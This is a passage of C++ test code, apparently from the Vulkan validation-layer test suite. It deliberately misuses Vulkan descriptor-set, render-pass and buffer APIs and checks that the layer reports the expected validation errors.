below VkShaderObj vs(m_device, bindStateVertShaderText, VK_SHADER_STAGE_VERTEX_BIT, this); VkShaderObj fs(m_device, bindStateFragUniformShaderText, VK_SHADER_STAGE_FRAGMENT_BIT, this); VkPipelineObj pipe(m_device); pipe.AddShader(&vs); pipe.AddShader(&fs); pipe.AddDefaultColorAttachment(); pipe.CreateVKPipeline(pipe_layout_fs_only.handle(), renderPass()); m_commandBuffer->begin(); m_commandBuffer->BeginRenderPass(m_renderPassBeginInfo); vk::CmdBindPipeline(m_commandBuffer->handle(), VK_PIPELINE_BIND_POINT_GRAPHICS, pipe.handle()); // TODO : Want to cause various binding incompatibility issues here to test // DrawState // First cause various verify_layout_compatibility() fails // Second disturb early and late sets and verify INFO msgs // VerifySetLayoutCompatibility fail cases: // 1. invalid VkPipelineLayout (layout) passed into vk::CmdBindDescriptorSets m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, "VUID-vkCmdBindDescriptorSets-layout-parameter"); vk::CmdBindDescriptorSets(m_commandBuffer->handle(), VK_PIPELINE_BIND_POINT_GRAPHICS, CastToHandle<VkPipelineLayout, uintptr_t>(0xbaadb1be), 0, 1, &descriptorSet[0], 0, NULL); m_errorMonitor->VerifyFound(); // 2. layoutIndex exceeds # of layouts in layout m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, " attempting to bind set to index 1"); vk::CmdBindDescriptorSets(m_commandBuffer->handle(), VK_PIPELINE_BIND_POINT_GRAPHICS, single_pipe_layout.handle(), 0, 2, &descriptorSet[0], 0, NULL); m_errorMonitor->VerifyFound(); // 3. Pipeline setLayout[0] has 2 descriptors, but set being bound has 5 // descriptors m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, " has 2 total descriptors, but "); vk::CmdBindDescriptorSets(m_commandBuffer->handle(), VK_PIPELINE_BIND_POINT_GRAPHICS, pipe_layout_one_desc.handle(), 0, 1, &descriptorSet[0], 0, NULL); m_errorMonitor->VerifyFound(); // 4. same # of descriptors but mismatch in type m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, " is type 'VK_DESCRIPTOR_TYPE_SAMPLER' but binding "); vk::CmdBindDescriptorSets(m_commandBuffer->handle(), VK_PIPELINE_BIND_POINT_GRAPHICS, pipe_layout_five_samp.handle(), 0, 1, &descriptorSet[0], 0, NULL); m_errorMonitor->VerifyFound(); // 5. same # of descriptors but mismatch in stageFlags m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, " has stageFlags VK_SHADER_STAGE_FRAGMENT_BIT but binding 0 for "); vk::CmdBindDescriptorSets(m_commandBuffer->handle(), VK_PIPELINE_BIND_POINT_GRAPHICS, pipe_layout_fs_only.handle(), 0, 1, &descriptorSet[0], 0, NULL); m_errorMonitor->VerifyFound(); // Now that we're done actively using the pipelineLayout that gfx pipeline // was created with, we should be able to delete it. Do that now to verify // that validation obeys pipelineLayout lifetime pipe_layout_fs_only.Reset(); // Cause draw-time errors due to PSO incompatibilities // 1. Error due to not binding required set (we actually use same code as // above to disturb set0) vk::CmdBindDescriptorSets(m_commandBuffer->handle(), VK_PIPELINE_BIND_POINT_GRAPHICS, pipeline_layout.handle(), 0, 2, &descriptorSet[0], 0, NULL); vk::CmdBindDescriptorSets(m_commandBuffer->handle(), VK_PIPELINE_BIND_POINT_GRAPHICS, pipe_layout_bad_set0.handle(), 1, 1, &descriptorSet[1], 0, NULL); m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, " uses set #0 but that set is not bound."); VkViewport viewport = {0, 0, 16, 16, 0, 1}; VkRect2D scissor = {{0, 0}, {16, 16}}; vk::CmdSetViewport(m_commandBuffer->handle(), 0, 1, &viewport); vk::CmdSetScissor(m_commandBuffer->handle(), 0, 1, &scissor); m_commandBuffer->Draw(1, 0, 0, 0); m_errorMonitor->VerifyFound(); // 2. Error due to bound set not being compatible with PSO's // VkPipelineLayout (diff stageFlags in this case) vk::CmdBindDescriptorSets(m_commandBuffer->handle(), VK_PIPELINE_BIND_POINT_GRAPHICS, pipeline_layout.handle(), 0, 2, &descriptorSet[0], 0, NULL); m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, " bound as set #0 is not compatible with "); m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, "VUID-vkCmdDraw-None-02697"); m_commandBuffer->Draw(1, 0, 0, 0); m_errorMonitor->VerifyFound(); // Remaining clean-up m_commandBuffer->EndRenderPass(); m_commandBuffer->end(); vk::DestroyDescriptorPool(m_device->device(), ds_pool, NULL); } TEST_F(VkLayerTest, NullRenderPass) { // Bind a NULL RenderPass m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, "vkCmdBeginRenderPass: required parameter pRenderPassBegin specified as NULL"); ASSERT_NO_FATAL_FAILURE(Init()); ASSERT_NO_FATAL_FAILURE(InitRenderTarget()); m_commandBuffer->begin(); // Don't care about RenderPass handle b/c error should be flagged before // that vk::CmdBeginRenderPass(m_commandBuffer->handle(), NULL, VK_SUBPASS_CONTENTS_INLINE); m_errorMonitor->VerifyFound(); m_commandBuffer->end(); } TEST_F(VkLayerTest, EndCommandBufferWithinRenderPass) { TEST_DESCRIPTION("End a command buffer with an active render pass"); m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, "VUID-vkEndCommandBuffer-commandBuffer-00060"); ASSERT_NO_FATAL_FAILURE(Init()); ASSERT_NO_FATAL_FAILURE(InitRenderTarget()); m_commandBuffer->begin(); m_commandBuffer->BeginRenderPass(m_renderPassBeginInfo); vk::EndCommandBuffer(m_commandBuffer->handle()); m_errorMonitor->VerifyFound(); // End command buffer properly to avoid driver issues. This is safe -- the // previous vk::EndCommandBuffer should not have reached the driver. m_commandBuffer->EndRenderPass(); m_commandBuffer->end(); // TODO: Add test for VK_COMMAND_BUFFER_LEVEL_SECONDARY // TODO: Add test for VK_COMMAND_BUFFER_USAGE_RENDER_PASS_CONTINUE_BIT } TEST_F(VkLayerTest, DSUsageBitsErrors) { TEST_DESCRIPTION("Attempt to update descriptor sets for images and buffers that do not have correct usage bits sets."); ASSERT_NO_FATAL_FAILURE(Init()); const VkFormat buffer_format = VK_FORMAT_R8_UNORM; VkFormatProperties format_properties; vk::GetPhysicalDeviceFormatProperties(gpu(), buffer_format, &format_properties); if (!(format_properties.bufferFeatures & VK_FORMAT_FEATURE_STORAGE_TEXEL_BUFFER_BIT)) { printf("%s Device does not support VK_FORMAT_FEATURE_STORAGE_TEXEL_BUFFER_BIT for this format; skipped.\n", kSkipPrefix); return; } std::array<VkDescriptorPoolSize, VK_DESCRIPTOR_TYPE_RANGE_SIZE> ds_type_count; for (uint32_t i = 0; i < ds_type_count.size(); ++i) { ds_type_count[i].type = VkDescriptorType(i); ds_type_count[i].descriptorCount = 1; } vk_testing::DescriptorPool ds_pool; ds_pool.init(*m_device, vk_testing::DescriptorPool::create_info(0, VK_DESCRIPTOR_TYPE_RANGE_SIZE, ds_type_count)); ASSERT_TRUE(ds_pool.initialized()); std::vector<VkDescriptorSetLayoutBinding> dsl_bindings(1); dsl_bindings[0].binding = 0; dsl_bindings[0].descriptorType = VkDescriptorType(0); dsl_bindings[0].descriptorCount = 1; dsl_bindings[0].stageFlags = VK_SHADER_STAGE_ALL; dsl_bindings[0].pImmutableSamplers = NULL; // Create arrays of layout and descriptor objects using UpDescriptorSet = std::unique_ptr<vk_testing::DescriptorSet>; std::vector<UpDescriptorSet> descriptor_sets; using UpDescriptorSetLayout = std::unique_ptr<VkDescriptorSetLayoutObj>; std::vector<UpDescriptorSetLayout> ds_layouts; descriptor_sets.reserve(VK_DESCRIPTOR_TYPE_RANGE_SIZE); ds_layouts.reserve(VK_DESCRIPTOR_TYPE_RANGE_SIZE); for (uint32_t i = 0; i < VK_DESCRIPTOR_TYPE_RANGE_SIZE; ++i) { dsl_bindings[0].descriptorType = VkDescriptorType(i); ds_layouts.push_back(UpDescriptorSetLayout(new VkDescriptorSetLayoutObj(m_device, dsl_bindings))); descriptor_sets.push_back(UpDescriptorSet(ds_pool.alloc_sets(*m_device, *ds_layouts.back()))); ASSERT_TRUE(descriptor_sets.back()->initialized()); } // Create a buffer & bufferView to be used for invalid updates const VkDeviceSize buffer_size = 256; uint8_t data[buffer_size]; VkConstantBufferObj buffer(m_device, buffer_size, data, VK_BUFFER_USAGE_UNIFORM_TEXEL_BUFFER_BIT); VkConstantBufferObj storage_texel_buffer(m_device, buffer_size, data, VK_BUFFER_USAGE_STORAGE_TEXEL_BUFFER_BIT); ASSERT_TRUE(buffer.initialized() && storage_texel_buffer.initialized()); auto buff_view_ci = vk_testing::BufferView::createInfo(buffer.handle(), VK_FORMAT_R8_UNORM); vk_testing::BufferView buffer_view_obj, storage_texel_buffer_view_obj; buffer_view_obj.init(*m_device, buff_view_ci); buff_view_ci.buffer = storage_texel_buffer.handle(); storage_texel_buffer_view_obj.init(*m_device, buff_view_ci); ASSERT_TRUE(buffer_view_obj.initialized() && storage_texel_buffer_view_obj.initialized()); VkBufferView buffer_view = buffer_view_obj.handle(); VkBufferView storage_texel_buffer_view = storage_texel_buffer_view_obj.handle(); // Create an image to be used for invalid updates VkImageObj image_obj(m_device); image_obj.InitNoLayout(64, 64, 1, VK_FORMAT_R8G8B8A8_UNORM, VK_IMAGE_USAGE_COLOR_ATTACHMENT_BIT, VK_IMAGE_TILING_OPTIMAL, 0); ASSERT_TRUE(image_obj.initialized()); VkImageView image_view = image_obj.targetView(VK_FORMAT_R8G8B8A8_UNORM); VkDescriptorBufferInfo buff_info = {}; buff_info.buffer = buffer.handle(); VkDescriptorImageInfo img_info = {}; img_info.imageView = image_view; VkWriteDescriptorSet descriptor_write = {}; descriptor_write.sType = VK_STRUCTURE_TYPE_WRITE_DESCRIPTOR_SET; descriptor_write.dstBinding = 0; descriptor_write.descriptorCount = 1; descriptor_write.pTexelBufferView = &buffer_view; descriptor_write.pBufferInfo = &buff_info; descriptor_write.pImageInfo = &img_info; // These error messages align with VkDescriptorType struct std::string error_codes[] = { "UNASSIGNED-CoreValidation-DrawState-InvalidImageView", // placeholder, no error for SAMPLER descriptor "UNASSIGNED-CoreValidation-DrawState-InvalidImageView", // COMBINED_IMAGE_SAMPLER "UNASSIGNED-CoreValidation-DrawState-InvalidImageView", // SAMPLED_IMAGE "UNASSIGNED-CoreValidation-DrawState-InvalidImageView", // STORAGE_IMAGE "VUID-VkWriteDescriptorSet-descriptorType-00334", // UNIFORM_TEXEL_BUFFER "VUID-VkWriteDescriptorSet-descriptorType-00335", // STORAGE_TEXEL_BUFFER "VUID-VkWriteDescriptorSet-descriptorType-00330", // UNIFORM_BUFFER "VUID-VkWriteDescriptorSet-descriptorType-00331", // STORAGE_BUFFER "VUID-VkWriteDescriptorSet-descriptorType-00330", // UNIFORM_BUFFER_DYNAMIC "VUID-VkWriteDescriptorSet-descriptorType-00331", // STORAGE_BUFFER_DYNAMIC "UNASSIGNED-CoreValidation-DrawState-InvalidImageView" // INPUT_ATTACHMENT }; // Start loop at 1 as SAMPLER desc type has no usage bit error for (uint32_t i = 1; i < VK_DESCRIPTOR_TYPE_RANGE_SIZE; ++i) { if (VkDescriptorType(i) == VK_DESCRIPTOR_TYPE_UNIFORM_TEXEL_BUFFER) { // Now check for UNIFORM_TEXEL_BUFFER using storage_texel_buffer_view descriptor_write.pTexelBufferView = &storage_texel_buffer_view; } descriptor_write.descriptorType = VkDescriptorType(i); descriptor_write.dstSet = descriptor_sets[i]->handle(); m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, error_codes[i]); vk::UpdateDescriptorSets(m_device->device(), 1, &descriptor_write, 0, NULL); m_errorMonitor->VerifyFound(); if (VkDescriptorType(i) == VK_DESCRIPTOR_TYPE_UNIFORM_TEXEL_BUFFER) { descriptor_write.pTexelBufferView = &buffer_view; } } } TEST_F(VkLayerTest, DSBufferInfoErrors) { TEST_DESCRIPTION( "Attempt to update buffer descriptor set that has incorrect parameters in VkDescriptorBufferInfo struct. This includes:\n" "1. offset value greater than or equal to buffer size\n" "2. range value of 0\n" "3. range value greater than buffer (size - offset)"); // GPDDP2 needed for push descriptors support below bool gpdp2_support = InstanceExtensionSupported(VK_KHR_GET_PHYSICAL_DEVICE_PROPERTIES_2_EXTENSION_NAME, VK_KHR_GET_PHYSICAL_DEVICE_PROPERTIES_2_SPEC_VERSION); if (gpdp2_support) { m_instance_extension_names.push_back(VK_KHR_GET_PHYSICAL_DEVICE_PROPERTIES_2_EXTENSION_NAME); } ASSERT_NO_FATAL_FAILURE(InitFramework(myDbgFunc, m_errorMonitor)); bool update_template_support = DeviceExtensionSupported(gpu(), nullptr, VK_KHR_DESCRIPTOR_UPDATE_TEMPLATE_EXTENSION_NAME); if (update_template_support) { m_device_extension_names.push_back(VK_KHR_DESCRIPTOR_UPDATE_TEMPLATE_EXTENSION_NAME); } else { printf("%s Descriptor Update Template Extensions not supported, template cases skipped.\n", kSkipPrefix); } // Note: Includes workaround for some implementations which incorrectly return 0 maxPushDescriptors bool push_descriptor_support = gpdp2_support && DeviceExtensionSupported(gpu(), nullptr, VK_KHR_PUSH_DESCRIPTOR_EXTENSION_NAME) && (GetPushDescriptorProperties(instance(), gpu()).maxPushDescriptors > 0); if (push_descriptor_support) { m_device_extension_names.push_back(VK_KHR_PUSH_DESCRIPTOR_EXTENSION_NAME); } else { printf("%s Push Descriptor Extension not supported, push descriptor cases skipped.\n", kSkipPrefix); } ASSERT_NO_FATAL_FAILURE(InitState(nullptr, nullptr, VK_COMMAND_POOL_CREATE_RESET_COMMAND_BUFFER_BIT)); std::vector<VkDescriptorSetLayoutBinding> ds_bindings = { {0, VK_DESCRIPTOR_TYPE_UNIFORM_BUFFER, 1, VK_SHADER_STAGE_ALL, nullptr}}; OneOffDescriptorSet descriptor_set(m_device, ds_bindings); // Create a buffer to be used for invalid updates VkBufferCreateInfo buff_ci = {}; buff_ci.sType = VK_STRUCTURE_TYPE_BUFFER_CREATE_INFO; buff_ci.usage = VK_BUFFER_USAGE_UNIFORM_BUFFER_BIT; buff_ci.size = m_device->props.limits.minUniformBufferOffsetAlignment; buff_ci.sharingMode = VK_SHARING_MODE_EXCLUSIVE; VkBufferObj buffer; buffer.init(*m_device, buff_ci); VkDescriptorBufferInfo buff_info = {}; buff_info.buffer = buffer.handle(); VkWriteDescriptorSet descriptor_write = {}; descriptor_write.sType = VK_STRUCTURE_TYPE_WRITE_DESCRIPTOR_SET; descriptor_write.dstBinding = 0; descriptor_write.descriptorCount = 1; descriptor_write.pTexelBufferView = nullptr; descriptor_write.pBufferInfo = &buff_info; descriptor_write.pImageInfo = nullptr; descriptor_write.descriptorType = VK_DESCRIPTOR_TYPE_UNIFORM_BUFFER; descriptor_write.dstSet = descriptor_set.set_; // Relying on the "return nullptr for non-enabled extensions auto vkCreateDescriptorUpdateTemplateKHR = (PFN_vkCreateDescriptorUpdateTemplateKHR)vk::GetDeviceProcAddr(m_device->device(), "vkCreateDescriptorUpdateTemplateKHR"); auto vkDestroyDescriptorUpdateTemplateKHR = (PFN_vkDestroyDescriptorUpdateTemplateKHR)vk::GetDeviceProcAddr(m_device->device(), "vkDestroyDescriptorUpdateTemplateKHR"); auto vkUpdateDescriptorSetWithTemplateKHR = (PFN_vkUpdateDescriptorSetWithTemplateKHR)vk::GetDeviceProcAddr(m_device->device(), "vkUpdateDescriptorSetWithTemplateKHR"); if (update_template_support) { ASSERT_NE(vkCreateDescriptorUpdateTemplateKHR, nullptr); ASSERT_NE(vkDestroyDescriptorUpdateTemplateKHR, nullptr); ASSERT_NE(vkUpdateDescriptorSetWithTemplateKHR, nullptr); } // Setup for update w/ template tests // Create a template of descriptor set updates struct SimpleTemplateData { uint8_t padding[7]; VkDescriptorBufferInfo buff_info; uint32_t other_padding[4]; }; SimpleTemplateData update_template_data = {}; VkDescriptorUpdateTemplateEntry update_template_entry = {}; update_template_entry.dstBinding = 0; update_template_entry.dstArrayElement = 0; update_template_entry.descriptorCount = 1; update_template_entry.descriptorType = VK_DESCRIPTOR_TYPE_UNIFORM_BUFFER; update_template_entry.offset = offsetof(SimpleTemplateData, buff_info); update_template_entry.stride = sizeof(SimpleTemplateData); auto update_template_ci = lvl_init_struct<VkDescriptorUpdateTemplateCreateInfoKHR>(); update_template_ci.descriptorUpdateEntryCount = 1; update_template_ci.pDescriptorUpdateEntries = &update_template_entry; update_template_ci.templateType = VK_DESCRIPTOR_UPDATE_TEMPLATE_TYPE_DESCRIPTOR_SET; update_template_ci.descriptorSetLayout = descriptor_set.layout_.handle(); VkDescriptorUpdateTemplate update_template = VK_NULL_HANDLE; if (update_template_support) { auto result = vkCreateDescriptorUpdateTemplateKHR(m_device->device(), &update_template_ci, nullptr, &update_template); ASSERT_VK_SUCCESS(result); } // VK_KHR_push_descriptor support auto vkCmdPushDescriptorSetKHR = (PFN_vkCmdPushDescriptorSetKHR)vk::GetDeviceProcAddr(m_device->device(), "vkCmdPushDescriptorSetKHR"); auto vkCmdPushDescriptorSetWithTemplateKHR = (PFN_vkCmdPushDescriptorSetWithTemplateKHR)vk::GetDeviceProcAddr( m_device->device(), "vkCmdPushDescriptorSetWithTemplateKHR"); std::unique_ptr<VkDescriptorSetLayoutObj> push_dsl = nullptr; std::unique_ptr<VkPipelineLayoutObj> pipeline_layout = nullptr; VkDescriptorUpdateTemplate push_template = VK_NULL_HANDLE; if (push_descriptor_support) { ASSERT_NE(vkCmdPushDescriptorSetKHR, nullptr); push_dsl.reset( new VkDescriptorSetLayoutObj(m_device, ds_bindings, VK_DESCRIPTOR_SET_LAYOUT_CREATE_PUSH_DESCRIPTOR_BIT_KHR)); pipeline_layout.reset(new VkPipelineLayoutObj(m_device, {push_dsl.get()})); ASSERT_TRUE(push_dsl->initialized()); if (update_template_support) { ASSERT_NE(vkCmdPushDescriptorSetWithTemplateKHR, nullptr); auto push_template_ci = lvl_init_struct<VkDescriptorUpdateTemplateCreateInfoKHR>(); push_template_ci.descriptorUpdateEntryCount = 1; push_template_ci.pDescriptorUpdateEntries = &update_template_entry; push_template_ci.templateType = VK_DESCRIPTOR_UPDATE_TEMPLATE_TYPE_PUSH_DESCRIPTORS_KHR; push_template_ci.descriptorSetLayout = VK_NULL_HANDLE; push_template_ci.pipelineBindPoint = VK_PIPELINE_BIND_POINT_GRAPHICS; push_template_ci.pipelineLayout = pipeline_layout->handle(); push_template_ci.set = 0; auto result = vkCreateDescriptorUpdateTemplateKHR(m_device->device(), &push_template_ci, nullptr, &push_template); ASSERT_VK_SUCCESS(result); } } auto do_test = [&](const char *desired_failure) { m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, desired_failure); vk::UpdateDescriptorSets(m_device->device(), 1, &descriptor_write, 0, NULL); m_errorMonitor->VerifyFound(); if (push_descriptor_support) { m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, desired_failure); m_commandBuffer->begin(); vkCmdPushDescriptorSetKHR(m_commandBuffer->handle(), VK_PIPELINE_BIND_POINT_GRAPHICS, pipeline_layout->handle(), 0, 1, &descriptor_write); m_commandBuffer->end(); m_errorMonitor->VerifyFound(); } if (update_template_support) { update_template_data.buff_info = buff_info; // copy the test case information into our "pData" m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, desired_failure); vkUpdateDescriptorSetWithTemplateKHR(m_device->device(), descriptor_set.set_, update_template, &update_template_data); m_errorMonitor->VerifyFound(); if (push_descriptor_support) { m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, desired_failure); m_commandBuffer->begin(); vkCmdPushDescriptorSetWithTemplateKHR(m_commandBuffer->handle(), push_template, pipeline_layout->handle(), 0, &update_template_data); m_commandBuffer->end(); m_errorMonitor->VerifyFound(); } } }; // Cause error due to offset out of range buff_info.offset = buff_ci.size; buff_info.range = VK_WHOLE_SIZE; do_test("VUID-VkDescriptorBufferInfo-offset-00340"); // Now cause error due to range of 0 buff_info.offset = 0; buff_info.range = 0; do_test("VUID-VkDescriptorBufferInfo-range-00341"); // Now cause error due to range exceeding buffer size - offset buff_info.offset = 0; buff_info.range = buff_ci.size + 1; do_test("VUID-VkDescriptorBufferInfo-range-00342"); if (update_template_support) { vkDestroyDescriptorUpdateTemplateKHR(m_device->device(), update_template, nullptr); if (push_descriptor_support) { vkDestroyDescriptorUpdateTemplateKHR(m_device->device(), push_template, nullptr); } } } TEST_F(VkLayerTest, DSBufferLimitErrors) { TEST_DESCRIPTION( "Attempt to update buffer descriptor set that has VkDescriptorBufferInfo values that violate device limits.\n" "Test cases include:\n" "1. range of uniform buffer update exceeds maxUniformBufferRange\n" "2. offset of uniform buffer update is not multiple of minUniformBufferOffsetAlignment\n" "3. using VK_WHOLE_SIZE with uniform buffer size exceeding maxUniformBufferRange\n" "4. range of storage buffer update exceeds maxStorageBufferRange\n" "5. offset of storage buffer update is not multiple of minStorageBufferOffsetAlignment\n" "6. using VK_WHOLE_SIZE with storage buffer size exceeding maxStorageBufferRange"); ASSERT_NO_FATAL_FAILURE(Init()); struct TestCase { VkDescriptorType descriptor_type; VkBufferUsageFlagBits buffer_usage; VkDeviceSize max_range; std::string max_range_vu; VkDeviceSize min_align; std::string min_align_vu; }; for (const auto &test_case : { TestCase({VK_DESCRIPTOR_TYPE_UNIFORM_BUFFER, VK_BUFFER_USAGE_UNIFORM_BUFFER_BIT, m_device->props.limits.maxUniformBufferRange, "VUID-VkWriteDescriptorSet-descriptorType-00332", m_device->props.limits.minUniformBufferOffsetAlignment, "VUID-VkWriteDescriptorSet-descriptorType-00327"}), TestCase({VK_DESCRIPTOR_TYPE_STORAGE_BUFFER, VK_BUFFER_USAGE_STORAGE_BUFFER_BIT, m_device->props.limits.maxStorageBufferRange, "VUID-VkWriteDescriptorSet-descriptorType-00333", m_device->props.limits.minStorageBufferOffsetAlignment, "VUID-VkWriteDescriptorSet-descriptorType-00328"}), }) { // Create layout with single buffer OneOffDescriptorSet descriptor_set(m_device, { {0, test_case.descriptor_type, 1, VK_SHADER_STAGE_ALL, nullptr}, }); // Create a buffer to be used for invalid updates VkBufferCreateInfo bci = {}; bci.sType = VK_STRUCTURE_TYPE_BUFFER_CREATE_INFO; bci.usage = test_case.buffer_usage; bci.size = test_case.max_range + test_case.min_align; // Make buffer bigger than range limit bci.sharingMode = VK_SHARING_MODE_EXCLUSIVE; VkBuffer buffer; VkResult err = vk::CreateBuffer(m_device->device(), &bci, NULL, &buffer); ASSERT_VK_SUCCESS(err); // Have to bind memory to buffer before descriptor update VkMemoryRequirements mem_reqs; vk::GetBufferMemoryRequirements(m_device->device(), buffer, &mem_reqs); VkMemoryAllocateInfo mem_alloc = {}; mem_alloc.sType = VK_STRUCTURE_TYPE_MEMORY_ALLOCATE_INFO; mem_alloc.pNext = NULL; mem_alloc.allocationSize = mem_reqs.size; bool pass = m_device->phy().set_memory_type(mem_reqs.memoryTypeBits, &mem_alloc, 0); if (!pass) { printf("%s Failed to allocate memory in DSBufferLimitErrors; skipped.\n", kSkipPrefix); vk::DestroyBuffer(m_device->device(), buffer, NULL); continue; } VkDeviceMemory mem; err = vk::AllocateMemory(m_device->device(), &mem_alloc, NULL, &mem); if (VK_SUCCESS != err) { printf("%s Failed to allocate memory in DSBufferLimitErrors; skipped.\n", kSkipPrefix); vk::DestroyBuffer(m_device->device(), buffer, NULL); continue; } err = vk::BindBufferMemory(m_device->device(), buffer, mem, 0); ASSERT_VK_SUCCESS(err); VkDescriptorBufferInfo buff_info = {}; buff_info.buffer = buffer; VkWriteDescriptorSet descriptor_write = {}; descriptor_write.sType = VK_STRUCTURE_TYPE_WRITE_DESCRIPTOR_SET; descriptor_write.dstBinding = 0; descriptor_write.descriptorCount = 1; descriptor_write.pTexelBufferView = nullptr; descriptor_write.pBufferInfo = &buff_info; descriptor_write.pImageInfo = nullptr; descriptor_write.descriptorType = test_case.descriptor_type; descriptor_write.dstSet = descriptor_set.set_; // Exceed range limit if (test_case.max_range != UINT32_MAX) { buff_info.range = test_case.max_range + 1; buff_info.offset = 0; m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, test_case.max_range_vu); vk::UpdateDescriptorSets(m_device->device(), 1, &descriptor_write, 0, NULL); m_errorMonitor->VerifyFound(); } // Reduce size of range to acceptable limit and cause offset error if (test_case.min_align > 1) { buff_info.range = test_case.max_range; buff_info.offset = test_case.min_align - 1; m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, test_case.min_align_vu); vk::UpdateDescriptorSets(m_device->device(), 1, &descriptor_write, 0, NULL); m_errorMonitor->VerifyFound(); } // Exceed effective range limit by using VK_WHOLE_SIZE buff_info.range = VK_WHOLE_SIZE; buff_info.offset = 0; m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, test_case.max_range_vu); vk::UpdateDescriptorSets(m_device->device(), 1, &descriptor_write, 0, NULL); m_errorMonitor->VerifyFound(); // Cleanup vk::FreeMemory(m_device->device(), mem, NULL); vk::DestroyBuffer(m_device->device(), buffer, NULL); } } TEST_F(VkLayerTest, DSAspectBitsErrors) { TEST_DESCRIPTION("Attempt to update descriptor sets for images that do not have correct aspect bits sets."); VkResult err; // Enable KHR multiplane req'd extensions bool mp_extensions = InstanceExtensionSupported(VK_KHR_GET_PHYSICAL_DEVICE_PROPERTIES_2_EXTENSION_NAME, VK_KHR_GET_MEMORY_REQUIREMENTS_2_SPEC_VERSION); if (mp_extensions) { m_instance_extension_names.push_back(VK_KHR_GET_PHYSICAL_DEVICE_PROPERTIES_2_EXTENSION_NAME); } ASSERT_NO_FATAL_FAILURE(InitFramework(myDbgFunc, m_errorMonitor)); mp_extensions = mp_extensions && DeviceExtensionSupported(gpu(), nullptr, VK_KHR_MAINTENANCE1_EXTENSION_NAME); mp_extensions = mp_extensions && DeviceExtensionSupported(gpu(), nullptr, VK_KHR_GET_MEMORY_REQUIREMENTS_2_EXTENSION_NAME); mp_extensions = mp_extensions && DeviceExtensionSupported(gpu(), nullptr, VK_KHR_BIND_MEMORY_2_EXTENSION_NAME); mp_extensions = mp_extensions && DeviceExtensionSupported(gpu(), nullptr, VK_KHR_SAMPLER_YCBCR_CONVERSION_EXTENSION_NAME); if (mp_extensions) { m_device_extension_names.push_back(VK_KHR_MAINTENANCE1_EXTENSION_NAME); m_device_extension_names.push_back(VK_KHR_GET_MEMORY_REQUIREMENTS_2_EXTENSION_NAME); m_device_extension_names.push_back(VK_KHR_BIND_MEMORY_2_EXTENSION_NAME); m_device_extension_names.push_back(VK_KHR_SAMPLER_YCBCR_CONVERSION_EXTENSION_NAME); } ASSERT_NO_FATAL_FAILURE(InitState()); auto depth_format = FindSupportedDepthStencilFormat(gpu()); if (!depth_format) { printf("%s No Depth + Stencil format found. Skipped.\n", kSkipPrefix); } else { OneOffDescriptorSet descriptor_set(m_device, { {0, VK_DESCRIPTOR_TYPE_INPUT_ATTACHMENT, 1, VK_SHADER_STAGE_ALL, nullptr}, }); // Create an image to be used for invalid updates VkImageObj image_obj(m_device); VkFormatProperties format_props; vk::GetPhysicalDeviceFormatProperties(m_device->phy().handle(), depth_format, &format_props); if (!image_obj.IsCompatible(VK_IMAGE_USAGE_SAMPLED_BIT, format_props.optimalTilingFeatures)) { printf("%s Depth + Stencil format cannot be sampled with optimalTiling. Skipped.\n", kSkipPrefix); } else { image_obj.Init(64, 64, 1, depth_format, VK_IMAGE_USAGE_SAMPLED_BIT, VK_IMAGE_TILING_OPTIMAL); ASSERT_TRUE(image_obj.initialized()); VkImage image = image_obj.image(); // Now create view for image VkImageViewCreateInfo image_view_ci = {}; image_view_ci.sType = VK_STRUCTURE_TYPE_IMAGE_VIEW_CREATE_INFO; image_view_ci.image = image; image_view_ci.format = depth_format; image_view_ci.viewType = VK_IMAGE_VIEW_TYPE_2D; image_view_ci.subresourceRange.layerCount = 1; image_view_ci.subresourceRange.baseArrayLayer = 0; image_view_ci.subresourceRange.levelCount = 1; // Setting both depth & stencil aspect bits is illegal for an imageView used // to populate a descriptor set. image_view_ci.subresourceRange.aspectMask = VK_IMAGE_ASPECT_DEPTH_BIT | VK_IMAGE_ASPECT_STENCIL_BIT; VkImageView image_view; err = vk::CreateImageView(m_device->device(), &image_view_ci, NULL, &image_view); ASSERT_VK_SUCCESS(err); descriptor_set.WriteDescriptorImageInfo(0, image_view, VK_NULL_HANDLE, VK_DESCRIPTOR_TYPE_INPUT_ATTACHMENT); const char *error_msg = "VUID-VkDescriptorImageInfo-imageView-01976"; m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, error_msg); descriptor_set.UpdateDescriptorSets(); m_errorMonitor->VerifyFound(); vk::DestroyImageView(m_device->device(), image_view, NULL); } } if (!mp_extensions) { printf("%s test requires KHR multiplane extensions, not available. Skipping.\n", kSkipPrefix); } else { OneOffDescriptorSet descriptor_set(m_device, { {0, VK_DESCRIPTOR_TYPE_COMBINED_IMAGE_SAMPLER, 1, VK_SHADER_STAGE_ALL, nullptr}, }); VkFormat mp_format = VK_FORMAT_G8_B8R8_2PLANE_420_UNORM; // commonly supported multi-planar format VkImageObj image_obj(m_device); VkFormatProperties format_props; vk::GetPhysicalDeviceFormatProperties(m_device->phy().handle(), mp_format, &format_props); if 